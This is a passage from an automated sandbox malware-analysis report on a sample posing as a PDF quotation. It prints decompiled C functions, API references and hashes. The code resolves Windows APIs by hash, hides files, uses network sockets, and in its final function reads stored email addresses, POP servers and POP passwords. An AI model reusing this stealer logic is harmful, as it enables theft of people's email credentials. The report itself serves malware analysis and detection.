				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                0x004060c6
                0x004060d5
                0x004060d8
                0x004060f4
                0x004060f6
                0x004060fb
                0x0040610a
                0x00406115
                0x0040611c
                0x0040611e
                0x00406121
                0x00000000
                0x0040612a
                0x0040612f

                APIs
                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: CheckMembershipToken
                • String ID:
                • API String ID: 1351025785-0
                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                0x00403c68
                0x00403c70
                0x00403c78
                0x00403c82
                0x00403c8b
                0x00403c8f
                0x00403c72
                0x00403c76
                0x00403c76

                APIs
                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory
                • String ID:
                • API String ID: 4241100979-0
                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                0x0040643c
                0x00406445
                0x00406454

                APIs
                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: InfoNativeSystem
                • String ID:
                • API String ID: 1721193555-0
                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                0x00404eed
                0x00404ef2
                0x00404efd
                0x00404efd
                0x00404f07
                0x00404f0e

                APIs
                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: send
                • String ID:
                • API String ID: 2809346765-0
                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                0x00403bdd
                0x00403beb
                0x00403bee

                APIs
                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: FileMove
                • String ID:
                • API String ID: 3562171763-0
                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                Download Yara Rule
                APIs
                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                0x0040428a
                0x00404297
                0x0040429a

                APIs
                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                0x00404a27
                0x00404a35
                0x00404a38

                APIs
                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                0x00403c4d
                0x00403c55
                0x00403c58

                APIs
                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                0x00403c15
                0x00403c1d
                0x00403c20

                APIs
                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                0x00402c2c
                0x00402c34
                0x00402c37

                APIs
                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                0x00403bfc
                0x00403c04
                0x00403c07

                APIs
                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                0x00403bc4
                0x00403bcc
                0x00403bcf

                APIs
                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                0x00404a0d
                0x00404a15
                0x00404a18

                APIs
                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                0x00403b72
                0x00403b7a
                0x00403b7d

                APIs
                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID:
                • API String ID: 1174141254-0
                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                APIs
                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: closesocket
                • String ID:
                • API String ID: 2781271927-0
                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                0x00403fac
                0x00403fba
                0x00403fbe

                APIs
                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                0x0040647f
                0x00406487
                0x0040648a

                APIs
                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                0x004058f8
                0x00405903
                0x00405906

                APIs
                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                0x00405932
                0x0040593d
                0x00405940

                APIs
                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
